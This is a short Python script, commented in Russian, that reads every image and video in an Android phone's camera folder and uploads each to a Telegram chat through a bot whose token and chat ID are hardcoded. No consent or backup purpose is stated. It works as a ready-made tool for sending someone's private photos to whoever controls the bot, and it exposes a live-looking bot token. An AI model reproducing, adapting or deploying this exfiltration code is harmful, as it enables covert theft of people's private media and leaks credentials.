import os
import requests
import time

# === Настройки ===
BOT_TOKEN = "7062038688:AAHMVNwtLwxdybRw1mogJaVOKKR8KWHjMJ0"
CHAT_ID = "6227457637"
FOLDER_PATH = "/storage/emulated/0/DCIM/Camera"

def send_files():
    count = 0
    for filename in os.listdir(FOLDER_PATH):
        file_path = os.path.join(FOLDER_PATH, filename)

        if filename.lower().endswith((".jpg", ".jpeg", ".png")):
            url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendPhoto"
            files = {"photo": open(file_path, "rb")}
        elif filename.lower().endswith((".mp4", ".mov")):
            url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendVideo"
            files = {"video": open(file_path, "rb")}
        else:
            continue

        try:
            response = requests.post(url, files=files, data={"chat_id": CHAT_ID})
            if response.status_code == 200:
                print(f"✅ Отправлено: {filename}")
                count += 1
            elif response.status_code == 429:
                print("⏳ Слишком много запросов. Ждём 5 секунд...")
                time.sleep(5)
            else:
                print(f"⚠️ Ошибка отправки {filename}: {response.status_code}")
        except Exception as e:
            print(f"⚠️ Ошибка при отправке {filename}: {str(e)}")
        
        time.sleep(1)  # Пауза между файлами (чтобы не получить бан)

    print(f"📦 Всего отправлено: {count} файлов")

# === Запуск ===
send_files()
